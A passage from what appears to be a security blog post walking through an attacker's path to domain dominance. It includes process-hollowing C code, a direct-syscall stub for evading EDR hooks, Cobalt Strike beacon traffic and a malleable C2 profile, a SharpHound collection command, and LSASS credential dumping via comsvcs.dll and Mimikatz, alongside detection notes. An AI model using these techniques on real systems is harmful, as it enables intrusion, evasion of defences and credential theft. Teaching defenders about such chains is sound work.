class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Create suspended process, replace image with shellcode</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">STARTUPINFO si </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">PROCESS_INFORMATION pi </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">CreateProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"C:\\\\Windows\\\\System32\\\\svchost.exe\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              FALSE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> CREATE_SUSPENDED</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">si</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Get thread context to find image base</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">CONTEXT ctx </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">ContextFlags </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> CONTEXT_FULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">GetThreadContext</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Unmap original image, write shellcode at same base address</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">NtUnmapViewOfSection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PVOID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">imageBase</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">VirtualAllocEx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PVOID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">imageBase</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">               MEM_COMMIT </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> MEM_RESERVE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> PAGE_EXECUTE_READWRITE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">WriteProcessMemory</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PVOID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">imageBase</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcode</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Resume thread  now running attacker code inside svchost.exe</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">SetThreadContext</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">ResumeThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><br></span></code></pre></div></div>\n<p>The resulting process shows as <code>svchost.exe</code> in Task Manager and most EDR process trees. Detection requires checking whether the on-disk image hash matches what is loaded in memory  a capability present in some EDRs but not all.</p>\n<p><strong>Direct syscalls (bypasses user-mode hooks):</strong></p>\n<p>Modern EDRs hook user-mode APIs like <code>NtAllocateVirtualMemory</code>, <code>NtWriteVirtualMemory</code>, and <code>NtCreateThreadEx</code> in <code>ntdll.dll</code> to intercept injection attempts. Attackers bypass this by calling the syscall directly:</p>\n<div class=\"language-asm codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-asm codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">; Direct syscall stub for NtAllocateVirtualMemory (Windows 10 21H2 syscall number)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">NtAllocateVirtualMemory:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    mov r10, rcx</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    mov eax, 18h        ; syscall number  varies by Windows build</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    syscall</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ret</span><br></span></code></pre></div></div>\n<p>Tools like <strong>SysWhispers2</strong> and <strong>SysWhispers3</strong> automate generating these stubs for any NT function. The result: injection with no user-mode hooks touched, no EDR API intercept possible.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-3-c2-communication--what-the-beacon-actually-looks-like\">Stage 3: C2 Communication  What the Beacon Actually Looks Like<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-3-c2-communication--what-the-beacon-actually-looks-like\" class=\"hash-link\" aria-label=\"Direct link to Stage 3: C2 Communication  What the Beacon Actually Looks Like\" title=\"Direct link to Stage 3: C2 Communication  What the Beacon Actually Looks Like\" translate=\"no\">​</a></h3>\n<p>A tuned Cobalt Strike beacon over HTTPS will look like this on the wire:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># HTTP GET beacon request (simplified)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">GET /jquery-3.3.1.min.js HTTP/1.1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Host: updates.microsoftcdn-assets[.]com</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Accept-Language: en-US,en;q=0.5</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Accept-Encoding: gzip, deflate</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Cookie: __utma=1.1234567890.1234567890.1234567890.1234567890.1;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        __utmz=1.1234567890.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connection: keep-alive</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The cookie value is the encoded beacon metadata + encrypted command request</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The server response contains encoded tasking in the response body,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># disguised as a legitimate jQuery file</span><br></span></code></pre></div></div>\n<p>The malleable C2 profile controls all of this  URI, headers, encoding, response format. A sample profile snippet that mimics Amazon browsing:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">http-get {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    set uri \"/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    client {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Accept\" \"*/*\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Host\" \"www.amazon.com\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        metadata {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            base64url;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            prepend \"session-token=\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            prepend \"skin=noskin;\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            append \"csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            header \"Cookie\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    server {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Content-Type\" \"text/html; charset=UTF-8\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Server\" \"Server\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        output {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            print;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<p>The metadata block encodes the beacon's check-in data inside a realistic Cookie header. Network-level detection based on URI or header inspection will not catch this without behavioral analysis.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-4-reconnaissance--bloodhound-at-full-speed\">Stage 4: Reconnaissance  BloodHound at Full Speed<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-4-reconnaissance--bloodhound-at-full-speed\" class=\"hash-link\" aria-label=\"Direct link to Stage 4: Reconnaissance  BloodHound at Full Speed\" title=\"Direct link to Stage 4: Reconnaissance  BloodHound at Full Speed\" translate=\"no\">​</a></h3>\n<p>SharpHound (the BloodHound collector) runs as a .NET assembly, typically executed in-memory via <code>execute-assembly</code>:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Cobalt Strike console:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">execute-assembly /opt/tools/SharpHound.exe -c All --zipfilename loot.zip --outputdirectory C:\\Users\\Public\\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Common collection flags:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># -c All          : collect all data types (sessions, ACLs, trusts, containers)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># --stealth       : reduced noise mode, skips session enumeration</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># --domaincontroller &lt;DC&gt; : target specific DC to reduce distributed noise</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># --excludedcs    : skip DCs in session enumeration (less noisy)</span><br></span></code></pre></div></div>\n<p>What this generates on the network in the first 4 minutes:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># LDAP queries to DC (port 389/636):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=computer           (all machines in domain)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=user               (all user accounts)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=group              (all groups)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=organizationalUnit</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=trustedDomain      (trust relationships)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- nTSecurityDescriptor           (ACL collection  the noisy one)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- userAccountControl</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- servicePrincipalName           (Kerberoastable accounts)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># SMB connections (port 445) to sampled workstations:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- NetSessionEnum (session enumeration)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- This generates Event ID 4624 (logon) + 4634 (logoff) on each target</span><br></span></code></pre></div></div>\n<p>Total LDAP query volume against the DC: <strong>200–2000 queries in 4 minutes</strong> depending on domain size. For a 1,000-user domain, this is 3–8x the normal LDAP query rate from workstations  detectable but only if you are baselining LDAP rates per source.</p>\n<p><strong>Reading the BloodHound output  what the attacker sees:</strong></p>\n<!-- -->\n<p>The attacker now has a GPS-guided path to DA. The individual misconfigurations (helpdesk having local admin on workstations, a DA account running as a service) are each defensible in isolation  together they form a chain.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-5-credential-dumping\">Stage 5: Credential Dumping<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-5-credential-dumping\" class=\"hash-link\" aria-label=\"Direct link to Stage 5: Credential Dumping\" title=\"Direct link to Stage 5: Credential Dumping\" translate=\"no\">​</a></h3>\n<p><strong>Method 1: LSASS via comsvcs.dll (no external tools)</strong></p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Get LSASS PID</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tasklist /fi \"imagename eq lsass.exe\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Dump via built-in Windows DLL  no Mimikatz binary needed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 612 C:\\Windows\\Temp\\lsass.dmp full</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Exfiltrate and parse offline with Mimikatz:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">sekurlsa::minidump lsass.dmp</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">sekurlsa::logonpasswords</span><br></span></code></pre></div></div>\n<p>This uses a signed Microsoft DLL. No malware binary is written to disk.</p>\n<p><strong>Method 2: Direct syscall LSASS access (bypasses EDR hooks on OpenProcess)</strong></p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Using direct NtReadVirtualMemory syscall stub</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// EDR hooks on ReadProcessMemory in ntdll are bypassed</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">OBJECT_ATTRIBUTES oa </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">CLIENT_ID cid </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">HANDLE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">lsassPID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">NtOpenProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 